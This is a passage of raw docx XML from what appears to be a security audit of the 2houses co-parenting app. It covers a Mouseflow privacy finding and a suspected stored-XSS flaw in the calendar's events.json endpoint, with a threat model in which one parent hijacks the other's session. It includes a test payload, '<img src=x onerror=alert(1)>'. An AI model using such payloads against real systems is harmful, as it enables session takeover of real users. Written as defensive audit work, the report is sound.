          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If Mouseflow is not explicitly listed as a sub-processor in the DPA, this is likely a GDPR finding as well as a security one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Remove Mouseflow from authentication and account-recovery pages.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure per-URL exclusions in the Mouseflow dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audit Mouseflow's field exclusions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> server-side — don't rely on client-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>data-mf-replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attributes alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add Mouseflow to the sub-processor list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the privacy policy if you keep it, and update DPAs with customers accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Consider replacing Mouseflow with a self-hosted or EU-based replacement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., openreplay, PostHog self-hosted) given the sensitivity of the data class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Privacy policy says: "we use Stripe, OVH SAS, Google LLC, AWS, Mandrill, Google Analytics, Intercom"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mouseflow HAR evidence: loads of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>cdn.mouseflow.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + project ID in bundle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Related: similar concern for Intercom, Axeptio, Facebook Pixel, Mixpanel (loaded on various pages) — but Mouseflow is the most invasive (full session replay) so it's called out first</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-006 — Agenda JSON endpoint returns server-rendered HTML in `title`/`popoverContent` — likely stored-XSS vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> High (conditional — requires write access to confirm)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stored XSS / output encoding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tools.2houses.com/agenda/events.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, likely other object_type endpoints returning HTML-in-JSON  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Structure confirmed from HAR; exploitability not tested (would require creating an event — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>out of scope per user rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>GET /agenda/events.json?start=YYYY-MM-DD&amp;end=YYYY-MM-DD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns a JSON array where each object includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "id": 1295578,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "object_type": "event",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "title": "&lt;span class='color-bullet' style='background-color: #FF5900;'&gt;&lt;/span&gt;\n&lt;span class='color-bullet' style='background-color: #E6A2FC;'&gt;&lt;/span&gt;\nFootball Practice\n",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "popoverContent": "&lt;div class='event-popover-content'&gt;\n  &lt;p&gt;\n    &lt;i class=\"fa fa-user\"&gt;&lt;/i&gt;\n    Created by &lt;creator-name&gt;\n  &lt;/p&gt;\n  ...",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>popoverContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>raw HTML generated server-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — including user-supplied values (event title, location, repeat-rule description, creator name). The client is expected to render these fields with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the presence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;i class="fa fa-user"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Font Awesome icons is the smoking gun — they only work when HTML is parsed, not when text is rendered).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the server builds these HTML fragments by string-interpolating user input without HTML-escaping it, a malicious user can store XSS payloads in an event title and have them execute in the other parent's browser on next calendar load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Threat model context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a co-parenting app. The adversary is literally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the other parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Both parents have legitimate write access to the shared family calendar. A stored XSS in the title of a calendar event executes in the other parent's browser — and the other parent has:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_family_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> all readable from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see FINDING-001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Full read/write access to the shared calendar and messaging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Potentially admin access if they are a family primary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The blast radius of a stored XSS here is the complete takeover of the other parent's session, including the ability to delete or alter shared records (including messages that might be used in custody proceedings).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why I did not test this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The user explicitly said "don't create new records on 2houses, be careful not to leave any trace". Creating an event with a payload would:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Leave a record in the database (and their audit trail).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Show up in the other parent's view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trigger notifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All contrary to the instruction. I've flagged the surface and stopped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended test (when authorized and in a dedicated test family)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set up an isolated test account in a 2houses-internal test org.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Create an event with title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Load the calendar as another user in that test family.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Observe whether the payload executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigation — whether confirmed or not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Do not put HTML in JSON.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Return structured data (colour codes as separate fields, repeat rule as a machine-readable shape, creator name as a plain string) and build the HTML client-side with proper escaping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If HTML must be returned for backwards compatibility,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> build it with a template system that HTML-escapes interpolated values by default (ERB with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>h()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Rails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
